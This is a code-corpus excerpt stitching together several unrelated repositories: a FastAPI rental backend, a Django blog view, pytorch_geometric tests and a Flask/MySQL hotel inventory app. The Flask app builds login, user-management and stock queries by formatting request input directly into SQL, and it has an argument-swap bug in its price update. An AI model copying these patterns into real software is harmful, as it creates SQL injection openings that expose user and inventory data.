print('username: ', username, time.strftime('%M%S'), type(username))
response_json = {'status': 200, 'description': '请求成功', 'body': [
{'houseCode': '1111',
'title': '整租 中山路 历史最低点',
'desc':
'近地铁,附近有商场!254对数据集跑一下第二版仿真工程。',
'price': 3000,
'tags': ['近地铁', '集中供暖', '新上', '随时看房'],
'houseImg': 'static/images/轮播1.jpg'}
]}
if not username:
response_json = {'status': 400, 'description': 'token已过期', 'body': []}
print(username)
return response_json
@app.post("/user/houses")
async def post_user_houses(house: Houses, username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功'}
if not username:
response_json = {'status': 400, 'description': 'token已过期'}
# print(house)
return response_json
@app.get("/area/community")
async def get_area_community(name: str, id: str):
response_json = {'status': 200, 'description': '请求成功', 'body': [
{'community': '123', 'communityName': name}
]}
return response_json
@app.get("/items/{item_id}")
def read_item(item_id: int, q: str = None):
return {"item_id": item_id, "q": q}
```
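A hypothetical client-side sketch against the endpoints above (assumes the app is served at `http://localhost:8000` via the uvicorn command noted near the top of the file; the username and password values are illustrative):
```python
import requests

base = "http://localhost:8000"

# register, then log in to obtain a token
requests.post(f"{base}/user/registered", json={"username": "alice", "password": "secret"})
resp = requests.post(f"{base}/user/login", json={"username": "alice", "password": "secret"})
token = resp.json()["body"]["token"]

# the token is sent as a standard OAuth2 bearer token (see get_current_user in utils.py)
me = requests.get(f"{base}/user", headers={"Authorization": f"Bearer {token}"})
print(me.json())
```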
#### File: hook_up_rent/backend/utils.py
```python
from datetime import datetime, timedelta
from typing import Optional
import jwt
from fastapi import Depends
from fastapi.security import OAuth2PasswordBearer
from jwt.exceptions import PyJWTError
# from mysqlx import Session
from config import ALGORITHM, SECRET_KEY
# from orm import DBSession, DBUser, WithSession, get_db
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/token")
# generate a JWT access token with an expiry time
def create_access_token(data: dict, expires_delta: Optional[timedelta] = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=15)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
async def get_current_user(token: str = Depends(oauth2_scheme)):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str = payload.get("sub")
except PyJWTError:
username = None
return username
if __name__ == "__main__":
    # get_current_user is a coroutine, so it must be awaited
    import asyncio

    user = asyncio.run(get_current_user('<KEY>'))
    print(user)
``` |
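A small round-trip sketch for the token helpers above (assumes `config.py` provides `SECRET_KEY` and `ALGORITHM`, matching the imports in this file):
```python
from datetime import timedelta

import jwt

from config import ALGORITHM, SECRET_KEY
from utils import create_access_token

token = create_access_token({"sub": "alice"}, expires_delta=timedelta(minutes=30))
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
assert payload["sub"] == "alice"  # the same subject get_current_user() extracts
```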
{
"source": "jinjf553/mysite",
"score": 2
} |
#### File: mysite/blog/views.py
```python
from django.shortcuts import render, get_object_or_404
# Create your views here.
from blog.models import BlogArticles
def blog_title(request):
blogs = BlogArticles.objects.all()
return render(request, "blog/title.html", {"blogs": blogs})
def blog_article(request, article_id):
# article = BlogArticles.objects.get(id=article_id)
article = get_object_or_404(BlogArticles, id=article_id)
return render(request, "blog/content.html", {"article": article})
``` |
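A hypothetical URLconf sketch showing how the two views above could be routed; the URL paths and names are assumptions, not part of the repo excerpt:
```python
from django.urls import path

from blog import views

urlpatterns = [
    path("blog/", views.blog_title, name="blog_title"),
    path("blog/<int:article_id>/", views.blog_article, name="blog_article"),
]
```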
{
"source": "jinjh0123/pytorch_geometric",
"score": 2
} |
#### File: test/datasets/test_snap_dataset.py
```python
import os.path as osp
import random
import shutil
import sys
import pytest
from torch_geometric.datasets import SNAPDataset
@pytest.mark.skipif(True, reason="'https://snap.stanford.edu' not available")
def test_snap_dataset():
root = osp.join('/', 'tmp', str(random.randrange(sys.maxsize)))
for name in ['ego-facebook', 'soc-Slashdot0811', 'wiki-vote']:
SNAPDataset(root, name)
shutil.rmtree(root)
```
#### File: nn/conv/test_rgat_conv.py
```python
import pytest
import torch
from torch_sparse import SparseTensor
from torch_geometric.nn import RGATConv
@pytest.mark.parametrize('mod', [
'additive',
'scaled',
'f-additive',
'f-scaled',
])
@pytest.mark.parametrize('attention_mechanism', [
'within-relation',
'across-relation',
])
@pytest.mark.parametrize('attention_mode', [
'additive-self-attention',
'multiplicative-self-attention',
])
def test_rgat_conv(mod, attention_mechanism, attention_mode):
x = torch.randn(4, 8)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])
edge_type = torch.tensor([0, 2, 1, 2])
edge_attr = torch.randn((4, 8))
conv = RGATConv(8, 20, num_relations=4, num_bases=4, mod=mod,
attention_mechanism=attention_mechanism,
attention_mode=attention_mode, heads=2, dim=1, edge_dim=8)
assert str(conv) == 'RGATConv(8, 20, heads=2)'
out = conv(x, edge_index, edge_type, edge_attr)
assert out.size() == (4, 40)
def test_rgat_conv_jittable():
x = torch.randn(4, 8)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])
row, col = edge_index
edge_attr = torch.randn((4, 8))
adj = SparseTensor(row=row, col=col, value=edge_attr, sparse_sizes=(4, 4))
edge_type = torch.tensor([0, 2, 1, 2])
conv = RGATConv(8, 20, num_relations=4, num_bases=4, mod='additive',
attention_mechanism='across-relation',
attention_mode='additive-self-attention', heads=2, dim=1,
edge_dim=8, bias=False)
out = conv(x, edge_index, edge_type, edge_attr)
assert out.size() == (4, 40)
assert torch.allclose(conv(x, adj.t(), edge_type), out)
t = '(Tensor, Tensor, OptTensor, OptTensor, Size, NoneType) -> Tensor'
jit = torch.jit.script(conv.jittable(t))
assert torch.allclose(jit(x, edge_index, edge_type),
conv(x, edge_index, edge_type))
``` |
{
"source": "jinjiaho/project57",
"score": 2
} |
#### File: jinjiaho/project57/application.py
```python
from flask import Flask, render_template, request, session, redirect, url_for, flash, jsonify, g, json
from flask_babel import Babel
from flask_uploads import UploadSet, IMAGES, configure_uploads
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
from datetime import datetime
from forms import LoginForm, RetrievalForm, AddUserForm, CreateNewItem, AddNewLocation, ExistingItemsLocation, RemoveItem, TransferItem
from apscheduler.schedulers.background import BackgroundScheduler
# from exceptions import InsufficientQtyError, ContainsItemsError
# from apscheduler.jobstores.mongodb import MongoDBJobStore
# from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
import os, copy, re, csv, json_decode, imaging, pytz
# from flask.ext.cache import Cache
# pip2 install flask
# pip2 install mysql-python
# pip2 install mysqlclient
# pip2 install flask-SQLAlchemy
# pip2 install flask-babel
# pip2 install flask-wtf
# pip2 install flask-mysql
# pip2 install flask-uploads
# pip2 install pytz
# pip2 install numpy
# pip2 install scipy
# pip2 install statsmodels
# pip2 install pandas
# pip2 install Pillow
# eb init -p python2.7 aim
# eb init
# eb create flask-env
# eb open
# eb terminate flask-env
##########################
## CONFIG ##
##########################
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
application = Flask(__name__, instance_relative_config=True)
application.config.from_object('config.DevConfig') # default configurations
application.config.from_pyfile('config.py') # override with instanced configuration (in "/instance"), if any
#application.config.from_pyfile('myConfig1.py')
#application.config.from_pyfile('myConfig2.py')
# Babel init
babel = Babel(application)
# mysql init
mysql = MySQL()
mysql.init_app(application)
# global vars
adminmode = False
role = ""
# Configure the image uploading via Flask-Uploads
photos = UploadSet('images', IMAGES)
configure_uploads(application, photos)
sched = BackgroundScheduler()
# jobstores = {
# 'mongo': MongoDBJobStore(),
# 'default': SQLAlchemyJobStore(url='sqlite:///jobs.sqlite')
# }
# Exception classes, feel free to use.
# Called in admin()
class InsufficientQtyError(Exception):
pass
class ContainsItemsError(Exception):
pass
class InvalidPasswordError(Exception):
pass
###########################
## METHODS ##
###########################
# TODO: encapsulate all methods in separate classes and .py files
# Query for form select fields.
# Currently called by admin()
def choices(table, column, *args):
choices = []
conn = mysql.connect()
cursor = conn.cursor()
query = "SELECT {} FROM {}".format(column, table)
cursor.execute(query)
data1 = cursor.fetchall()
data2 = sorted(set(list(data1)))
for i in data2:
y=str(i[0])
x=(y,y)
choices.append(x)
return choices
# For populating select fields in admin forms with tags.
# Called by admin()
def storeTags():
choices = []
cursor = mysql.connect().cursor()
cursor.execute("SELECT tid, tname, storeroom FROM TagInfo;")
data = sorted(set(list(cursor.fetchall())))
for d in data:
value = d[0]
text = str(d[2]) + " - " + str(d[1])
pair = (value, text)
choices.append(pair)
return choices
def getAllTags():
cursor = mysql.connect().cursor()
cursor.execute("SELECT tid, tname, storeroom, remarks FROM TagInfo;")
data = sorted(set(list(cursor.fetchall())))
allTags = []
for i in data:
allTags.append({
'tid': i[0],
'tname': i[1].encode('ascii'),
'storeroom': i[2].encode('ascii'),
'remarks': i[3].encode('ascii')
})
return allTags
# Returns all the items based on category and amount in or out within the last month for each item
# Called by category()
def getAllInventory(category):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT iid, name, qty_left, reorder_pt, out_by, picture, category, ROUND(price,2) FROM Ascott_InvMgmt.view_item_locations WHERE category = '{}';".format(category))
data = cursor.fetchall()
print(data)
# cursor.execute(
# "SELECT DISTINCT iid FROM Ascott_InvMgmt.Items WHERE category = '{}';".format(category))
# unique_iid = cursor.fetchall()
# print(unique_iid)
items = []
counter = 0
for item in data:
if item[0] == counter:
pass
else:
cursor.execute(
"SELECT action, qty_moved FROM Ascott_InvMgmt.Logs WHERE month(date_time) = month(now()) AND year(date_time) = year(now()) AND item={};".format(item[0]))
in_out_data = cursor.fetchall()
delivered_out = 0
received = 0
for i in in_out_data:
if i[0].encode('ascii') == 'out':
delivered_out = delivered_out + (-1*int(i[1]))
elif i[0].encode('ascii') == "in":
received = received + int(i[1])
value_in = received*item[7]
value_out = delivered_out*item[7]
cursor.execute(
"SELECT qty_left FROM Ascott_InvMgmt.view_item_locations WHERE iid={};".format(item[0]))
location_qty = cursor.fetchall()
remaining_quantity = 0
for i in location_qty:
remaining_quantity += i[0]
initial_quantity = remaining_quantity + delivered_out - received
items.append(
{"iid":item[0],
"name": item[1],
"remaining": remaining_quantity,
"reorder": item[3],
"unit": item[4],
"starting": initial_quantity,
"received": received,
"demand": delivered_out,
"picture": item[5].encode('ascii'),
"category": item[6].encode('ascii'),
"value_in": value_in,
"value_out": value_out,
"price": item[7]
})
counter = item[0]
return items
# Quick query for inventory for mobile and web Inventory views.
# Called by inventory() and shelf()
# If location is None, we can infer that user has admin rights, and can therefore see the qty left.
def inventoryQuick(location):
items = []
conn = mysql.connect()
cursor = conn.cursor()
if location == None:
cursor.execute("""SELECT iid, name, category, picture, SUM(qty_left), reorder_pt, out_by FROM view_item_locations
GROUP BY iid;""")
data = cursor.fetchall()
for d in data:
items.append(
{"iid":d[0],
"name": d[1].encode('ascii'),
"category": d[2].encode('ascii'),
"picture": d[3].encode('ascii'),
"remaining": d[4],
"reorder": d[5],
"unit": d[6].encode('ascii')
})
else:
cursor.execute("""SELECT iid, name, category, picture, out_by FROM view_item_locations
WHERE tag='{}' AND reorder_pt >= 0;""".format(location))
data = cursor.fetchall()
conn.commit()
for d in data:
items.append(
{"iid":d[0],
"name": d[1].encode('ascii'),
"category": d[2].encode('ascii'),
"picture":d[3].encode('ascii'),
"unit":d[4].encode('ascii')
})
return items
# Stock Update Function for RA, Runner and Supervisors.
# Called by item() and shelf().
# Returns a [message, alert-category] pair that can be passed straight to flash().
def stockUpdate(iid, tagId, inputQty, user, action, time):
try:
conn = mysql.connect()
cursor = conn.cursor()
print(iid, tagId)
cursor.execute("SELECT qty_left, in_out_ratio FROM view_item_locations WHERE iid='{}' AND tag='{}';".format(iid, tagId))
data = cursor.fetchall()
print("data" ,data)
old_qty = data[0][0]
if action == 'out':
qty_left = old_qty - inputQty
qty_diff = inputQty * (-1) # make qty_input negative to reflect taking qty OUT of store.
if qty_left < 0:
raise InsufficientQtyError("Not enough in store!")
elif action == 'in':
print inputQty
print(inputQty*data[0][1])
qty_left = old_qty + inputQty*data[0][1]
qty_diff = qty_left - old_qty
else:
qty_left = inputQty
qty_diff = qty_left - old_qty # change the value of qty to the difference
conn = mysql.connect()
cursor = conn.cursor()
update_items_query = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(qty_left, iid, tagId)
# general query for all actions
# print(update_items_query)
cursor.execute(update_items_query)
conn.commit()
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT storeroom FROM TagInfo WHERE tid={};".format(tagId))
location = cursor.fetchall()[0][0]
# Log action
# conn = mysql.connect()
# cursor = conn.cursor()
update_logs_query = """INSERT INTO Logs (user, date_time, action, qty_moved, qty_left, item, location)
VALUES ('{}', '{}', '{}', {}, {}, {}, '{}');""".format(user, time, action, qty_diff, qty_left, iid, location)
# print(update_logs_query)
cursor.execute(update_logs_query)
conn.commit()
return ['Success!', "success"]
except InsufficientQtyError as e:
return [e.args[0], "danger"]
except Exception as e:
return ["STOCK UPDATE ERROR: %s" % e, "danger"]
# Returns all the items based on location. KIV for possible supervisor view filtering.
def getFromLevels(location):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT name, category, tag FROM Ascott_InvMgmt.view_item_locations WHERE tag={};".format(location))
data=cursor.fetchall()
things = []
for item in data:
things.append(
{"name": item[0],
"category": item[1],
"location":item[2]})
return things
# Returns the logs that occurred within the current month.
# Called by logs()
def getAllLogs():
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT user, date_time, action, qty_moved, qty_left, item, location FROM Ascott_InvMgmt.Logs WHERE month(date_time) = month(now()) AND year(date_time) = year(now());")
data=cursor.fetchall()
print(data)
things = []
if data != None:
for row in data:
print(row[5])
cursor.execute("SELECT name, category FROM Items WHERE iid={};".format(row[5]))
info = cursor.fetchall()[0]
item_name = info[0].encode('ascii')
category = info[1].encode('ascii')
things.append({"name": row[0].encode('ascii'),
"dateTime": row[1],
"action":row[2],
"move":row[3],
"remaining":row[4],
"category":category,
"item":item_name,
"location":row[6]})
# print(things)
return things
# Returns inventory items that are below threshold levels
# Called by dashboard()
def getInventoryLow():
THRESHOLD = 1.2
cursor = mysql.connect().cursor()
cursor.execute("""SELECT iid, name, qty_left, reorder_pt, picture, category, out_by FROM Ascott_InvMgmt.view_item_locations
WHERE qty_left <= '"""+str(THRESHOLD)+"""'*reorder_pt AND
qty_left > 0
ORDER BY name ASC;""")
data = cursor.fetchall()
r = []
for i in data:
r.append({"iid": i[0],
"name": i[1].encode('ascii'),
"qty_left": i[2],
"reorder_pt": i[3],
"picture": i[4].encode('ascii'),
"category": i[5].encode('ascii'),
"unit":i[6].encode('ascii')})
return r
# Called by dashboard()
def getDailyLogs():
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT user, date_time, action, qty_moved, qty_left, item, location FROM Ascott_InvMgmt.Logs WHERE day(date_time) = day(now());")
conn.commit()
data=cursor.fetchall()
things = []
for row in data:
cursor = mysql.connect().cursor()
cursor.execute("SELECT name FROM Items WHERE iid={};".format(row[5]))
item_name = cursor.fetchall()[0][0]
things.append({"name": row[0].encode('ascii'),
"dateTime": row[1],
"action":row[2].encode('ascii'),
"move":row[3],
"remaining":row[4],
"item":item_name.encode('ascii'),
"location":row[6].encode('ascii')})
return things
# POST for getting chart data
@application.route('/api/getChartData', methods=["POST"])
def getChartData():
print "CHART: content_type - ", request.content_type
print "CHART: request.json - ", request.json
if not request.json:
print "CHART: Bad JSON format, aborting chart creation..."
        return page_not_found(400)
else:
items = request.get_json()
iid = items[0]["iid"]
r = []
conn = mysql.connect()
cursor = conn.cursor()
for i in items:
# get transaction logs per tag
tag = i["tag"]
query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = {} AND location = '{}'".format(iid, tag)
cursor.execute(query)
data = cursor.fetchall()
r.append({
"loc": i["location"],
"val": data})
return jsonify(r)
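# Example request body for /api/getChartData (values are made up): a JSON array where every
# element names the same item id plus one tag/location pair to plot, e.g.
#   [{"iid": 3, "tag": 12, "location": "Level 5 store"},
#    {"iid": 3, "tag": 14, "location": "Basement store"}]
# The response is one {"loc": ..., "val": [(date_time, qty_left), ...]} series per tag.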
# POST for editing an item's reorder point
@application.route('/api/editReorder', methods=["POST"])
def editReorder():
print "REORDER: content_type - ", request.content_type
print "REORDER: request.json - ", request.json
if not request.json:
print "REORDER: Bad JSON format, aborting reorder modification..."
        return page_not_found(400)
else:
data = request.get_json()
name = data["name"].encode('ascii')
reorder = data["reorder"]
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"UPDATE Ascott_InvMgmt.Items SET reorder_pt={} WHERE (name='{}' AND iid > 0);".format(reorder, name))
conn.commit()
return jsonify("")
@application.route('/api/editPrice', methods=["POST"])
def editPrice():
print "PRICECHANGE: content_type - ", request.content_type
print "PRICECHANGE: request.json - ", request.json
if not request.json:
print "PRICECHANGE: Bad json format, aborting reorder modification..."
        return page_not_found(400)
else:
data = request.get_json()
iid = data["iid"].encode('ascii')
newprice = data["newprice"].encode('ascii')
effectdate = data["effectdate"].encode('ascii')
effectdate1 = datetime.strptime(effectdate , '%Y-%m-%d')
# print(type(effectdate1))
# conn = mysql.connect()
# cursor = conn.cursor()
# cursor.execute(
# "SELECT COUNT(*) FROM Ascott_InvMgmt.PriceChange WHERE item = '{}'".format(iid))
# price_changed=cursor.fetchall()
# conn = mysql.connect()
# cursor = conn.cursor()
# if price_changed[0][0] == 1:
# cursor.execute(
# "UPDATE Ascott_InvMgmt.PriceChange SET new_price= '{}' , date_effective= STR_TO_DATE( '{} 00:00:00', '%Y-%m-%d %H:%i:%s') WHERE (item = '{}');".format(newprice, effectdate, iid))
# conn.commit()
# elif price_changed[0][0] == 0:
# cursor.execute(
# "INSERT INTO Ascott_InvMgmt.PriceChange (item, new_price, date_effective) VALUES ('{}' ,'{}' ,'{}');".format(iid, newprice, effectdate))
# conn.commit()
try:
sched.remove_job(iid, jobstore=None)
except:
pass
# The job will be executed on effectdate
sched.add_job(priceChangenow, 'date', run_date=effectdate1, args=[iid,newprice], id=iid)
sched.print_jobs(jobstore=None)
# sched.start()
# print(sched.jobstores)
# idItem = cursor.fetchone()
# # query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = {0}".format(idItem)
# query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = 1"
# # TODO: string parameterisation
# # query = "SELECT datetime, qtyAfter FROM Ascott_InvMgmt.Logs WHERE idItem = {}".format(idItem)
# cursor.execute(query)
# responseData = cursor.fetchall()
return jsonify("")
def priceChangenow(iid,price):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("UPDATE Ascott_InvMgmt.Items SET price='{}' WHERE (iid = '{}');".format(iid,price))
conn.commit()
# conn = mysql.connect()
# cursor=conn.cursor()
# cursor.execute("DELETE FROM Ascott_InvMgmt.PriceChange WHERE (item = '{}');".format(iid))
# conn.commit()
return
# true if user is authenticated, else false
# used in ALL ROUTES
def auth():
if u'logged_in' in session:
return session['logged_in']
return False
# wrapper function for route redirection
def filter_role(roles_routes):
    for k, v in roles_routes.items():
if session['role'] == k:
return redirect(v)
# used as a Jinja template in HTML files
@application.template_filter('lang_strip')
def lang_strip(s):
l = re.search(r"(?m)(?<=(en\/)|(zh\/)|(ms\/)|(ta\/)).*$", str(s.encode('ascii')))
if l:
return l.group()
return None
# used as a Jinja template in HTML files
@application.template_filter('curr_time')
def curr_time(s):
tz = pytz.timezone(application.config["TIMEZONE"])
return s+datetime.now(tz).strftime('%I:%M %p')
# used as a Jinja template in HTML files
@application.template_filter('prop_name')
def prop_name(s):
return s+application.config["PROP_NAME"]
# case query for mobile input
def input_handler(qty, user):
query = 'UPDATE TagItems SET qty_left = CASE WHERE iid={} WHEN action'
# Issue: Need iid argument.
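# One possible completion of the helper above (sketch only — the original was left unfinished):
# pass the item id in explicitly and branch on the action inside a SQL CASE expression, e.g.
#   UPDATE TagItems
#   SET qty_left = CASE WHEN %(action)s = 'out' THEN qty_left - %(qty)s
#                       WHEN %(action)s = 'in'  THEN qty_left + %(qty)s
#                       ELSE %(qty)s END
#   WHERE iid = %(iid)s;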
# fires right before each request is delivered to the relevant route
@application.before_request
def before():
# localization setting
if request.view_args and 'lang_code' in request.view_args:
if request.view_args['lang_code'] not in application.config["BABEL_LOCALES"]:
g.current_lang = application.config["BABEL_DEFAULT_LOCALE"]
else:
g.current_lang = request.view_args['lang_code']
session["lang_code"] = g.current_lang
request.view_args.pop('lang_code')
else:
session["lang_code"] = application.config["BABEL_DEFAULT_LOCALE"]
g.current_lang = session["lang_code"]
# user authentication
if u'logged_in' not in session:
session["logged_in"] = False
@application.after_request
def add_header(r):
r.headers['Cache-Control'] = 'public, max-age=0'
r.headers['Pragma'] = 'no-cache'
r.headers['Expires'] = '0'
return r
# used in setting locale for each route
# used in ALL ROUTES
@babel.localeselector
def get_locale():
return g.get('current_lang', 'en')
@application.after_request
def add_no_cache_header(response):
response.cache_control.max_age=0
return response
##########################
## ROUTES ##
##########################
@application.route('/')
def hello():
# user authentication
if not session["logged_in"]:
return redirect(url_for("login", lang_code=session["lang_code"]))
else:
# user already logged_in previously
if session['role'] == "supervisor":
return redirect(url_for("dashboard", lang_code=session["lang_code"]))
elif session['role'] == "attendant":
return redirect(url_for("scanner", lang_code=session["lang_code"]))
elif session['role'] == "runner":
return redirect(url_for("scanner", lang_code=session["lang_code"]))
@application.route('/<lang_code>/login', methods=["GET", "POST"])
def login():
# create a login form to collect username & password
form = LoginForm()
if request.method == "POST":
if form.validate() == False:
return render_template("login.html", form=form)
else:
username = form.username.data
password = form.password.data
remember = form.remember.data
cursor = mysql.connect().cursor()
cursor.execute("SELECT username, password, role, name FROM User WHERE username= '{}';".format(username))
# check if user and pass data is correct by executing the db
# data is stored as a tuple
data = cursor.fetchone()
if data is None:
# username does not match records
flash('User does not exist')
return redirect(url_for("login", lang_code=get_locale()))
# elif password != <PASSWORD>:
elif check_password_hash(data[1], password) == False:
# password does not match records
flash('Incorrect password')
return redirect(url_for("login", lang_code=get_locale()))
else:
# username & password match
session['username'] = data[0]
session['role'] = data[2]
session['name'] = data[3]
session['logged_in'] = True
if remember:
session.permanent = True
# check role
if session['role'] == "supervisor":
if "next" in session:
return redirect(session.pop('next'))
else:
return redirect(url_for("dashboard", lang_code=get_locale()))
elif session['role'] == "attendant" or session['role'] == "runner":
if "next" in session:
return redirect(session.pop('next'))
else:
return redirect(url_for("scanner", lang_code=get_locale()))
elif request.method == "GET":
# user authentication
if not auth():
return render_template("login.html", form=form)
else:
# user already logged_in previously
if session['role'] == "supervisor":
return redirect(url_for("dashboard", lang_code=get_locale()))
elif session['role'] == "attendant":
return redirect(url_for("scanner", lang_code=get_locale()))
elif session['role'] == "runner":
return redirect(url_for("scanner", lang_code=get_locale()))
@application.route('/<lang_code>/admin', methods=["GET","POST"])
def admin():
form = AddUserForm()
form2 = CreateNewItem()
form3 = AddNewLocation()
form4 = ExistingItemsLocation()
removeItemForm = RemoveItem()
transferItemForm = TransferItem()
storeTagChoices = storeTags()
allTags = getAllTags()
print allTags
roles = choices('Permissions', 'role')
categories = ['Guest Hamper', 'Guest Supplies', 'Kitchenware']
cursor = mysql.connect().cursor()
cursor.execute("SELECT name, tag FROM view_item_locations;")
itemTags = cursor.fetchall()
# Initialize options for all select fields
form.role.choices = roles
form2.category.choices = choices('Items', 'category')
form3.location.choices = choices('TagInfo', 'storeroom')
form4.tid.choices = storeTagChoices
removeItemForm.iname.choices = choices('Items', 'name')
transferItemForm.tagOld.choices = storeTagChoices
transferItemForm.tagNew.choices = storeTagChoices
#--------------users table-------------------------
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT role, name, username FROM Ascott_InvMgmt.User;")
data = cursor.fetchall()
# print(data)
things = []
for item in data:
things.append(
{"role": item[0],
"name": item[1],
"username": item[2]})
#-------------NFCID----------------------------------
cursor.execute("SELECT DISTINCT tag FROM Ascott_InvMgmt.TagItems;")
data1 = cursor.fetchall() #displays all unique NFC id tags.
NFCs=[]
group={}
items=[]
for idNFC in data1:
NFCs.append(idNFC[0])
for i in NFCs:
try:
#fetch all item names pertaining to the tag.
cursor.execute("SELECT name, iid, qty_left FROM Ascott_InvMgmt.view_item_locations WHERE tag = {};".format(i))
data3=cursor.fetchall()
cursor.execute("SELECT tname FROM TagInfo WHERE tid={};".format(i))
l_name = cursor.fetchall()[0][0]
group[(i, l_name)] = data3
except:
pass
server = "http://ec2-52-77-253-63.ap-southeast-1.compute.amazonaws.com" # For exhibition
# server = "172.16.31.10/" # For Ascott use
if request.method =="GET":
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
cursor.execute("SELECT DISTINCT name FROM Ascott_InvMgmt.Items;")
items = cursor.fetchall()
# print (items)
flat_items = [item.encode('ascii') for sublist in items for item in sublist]
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
group=group,
server=server,
item_list=flat_items)
# ------------------All the various form tabs----------------------
# ------------------Add User Form ----------------------
elif request.method == "POST":
if request.form['name-form'] =='form':
if form.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
username = form.username.data
password = generate_password_hash(form.password.data)
role = form.role.data
name = form.name.data
newuser=[username,password,role,name]
conn = mysql.connect()
cursor = conn.cursor()
# TODO: string parameterisation
query = "INSERT INTO User VALUES ('{}','{}','{}','{}');".format(newuser[0],newuser[1],newuser[2],newuser[3])
# query = "INSERT INTO User (username,password,role,name) VALUES ();"
# print(query)
cursor.execute(query)
conn.commit()
# cursor.execute("COMMIT")
flash("User has been added!", "success")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Edit User Form ----------------------
elif request.form['name-form'] =='editUserForm':
try:
username = request.form["username"]
role = request.form["role"]
name = request.form["name"]
password = request.form["password"]
query = ""
messages = []
if role:
query += "UPDATE User SET role='{}' WHERE username='{}';".format(role, username)
messages.append(["User role updated to "+role, "success"])
if name:
query += "UPDATE User SET name='{}' WHERE username='{}';".format(name, username)
messages.append(["Name updated to "+name, "success"])
if password:
if auth():
query += "UPDATE User SET password='{}' WHERE username='{}';".format(generate_password_hash(password), username)
messages.append(["Password updated!", "success"])
else:
raise Exception("User authentication failed, please login again.")
conn = mysql.connect()
cursor = conn.cursor()
print query
cursor.execute(query)
conn.commit()
for i in messages:
flash(i[0], i[1])
            except Exception as e:
flash(e.args[0], "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Delete User Form ----------------------
elif request.form['name-form'] =='deleteUser':
print('form received')
username = request.form["username"]
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM User WHERE username='{}';".format(username)
print(query)
cursor.execute(query)
conn.commit()
flash("User deleted!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Item Form ----------------------
elif request.form['name-form'] =='form2':
if form2.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
itemname = form2.itemname.data
reorderpt = form2.reorderpt.data
category = form2.category.data
price = form2.price.data
out_by = form2.count_unit.data
in_by = form2.order_unit.data
in_out_ratio = form2.order_multiplier.data
if 'photo' in request.files:
try:
filename = photos.save(request.files['photo'])
except:
filename = "default.thumb"
flash('Photo selected is not a valid file', "danger")
thumbnail = imaging.Imaging().thumb(filename)
item = [itemname, category, thumbnail, price, reorderpt, out_by, in_by, in_out_ratio]
print(item)
try:
# TODO: string parameterisation
conn = mysql.connect()
cursor = conn.cursor()
# TODO: Change form to input appropriate information
query = "INSERT INTO Items (name, category, picture, price, reorder_pt, out_by, in_by, in_out_ratio) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}');".format(item[0],item[1],item[2],item[3],item[4],item[5],item[6],item[7])
cursor.execute(query)
conn.commit()
flash("Item has been added! Next, please assign a tag.", "success")
except Exception as e:
print(e)
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Remove Item Form ----------------------
elif request.form['name-form'] == 'removeItemForm':
if removeItemForm.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
iname = removeItemForm.iname.data
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT iid, picture FROM Items WHERE name='{}';".format(iname))
response = cursor.fetchall()[0]
try:
iid, picture = response[0], response[1].encode("ascii")
print "ADMIN: Deleting item #%s with thumbnail '%s' ..." % (iid, picture)
removeFromItems = "DELETE FROM Items WHERE name='{}';".format(iname)
print "SQL: %s" % removeFromItems
cursor.execute(removeFromItems)
conn.commit()
